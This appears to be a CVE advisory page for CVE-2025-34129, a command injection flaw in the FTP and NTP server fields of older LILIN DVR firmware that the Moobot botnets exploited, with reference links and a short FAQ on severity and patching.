CVE-2025-34129

Vulnerability Description

A command injection vulnerability exists in LILIN Digital Video Recorder (DVR) devices prior to firmware version 2.0b60_20200207 due to insufficient sanitization of the FTP and NTP Server fields in the service configuration. An attacker with access to the configuration interface can upload a malicious XML file with injected shell commands in these fields. Upon subsequent configuration syncs, these commands are executed with elevated privileges. This vulnerability was exploited in the wild by the Moobot botnets.

Related Weaknesses (CWE)

References

• https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day
• https://www.meritlilin.com/assets/uploads/support/file/M00158-TW.pdf
• https://www.vulncheck.com/advisories/lilin-dvr-multiple-vulnerabilities

FAQ

What is CVE-2025-34129?

CVE-2025-34129 is a documented vulnerability. A command injection vulnerability exists in LILIN Digital Video Recorder (DVR) devices prior to firmware version 2.0b60_20200207 due to insufficient sanitization of the FTP and NTP Server fields in th...

How severe is CVE-2025-34129?

CVSS scoring is not yet available for CVE-2025-34129. Check NVD for updates.

Is there a patch for CVE-2025-34129?

Check the references section above for vendor advisories and patch information. Review vendor security bulletins for remediation guidance.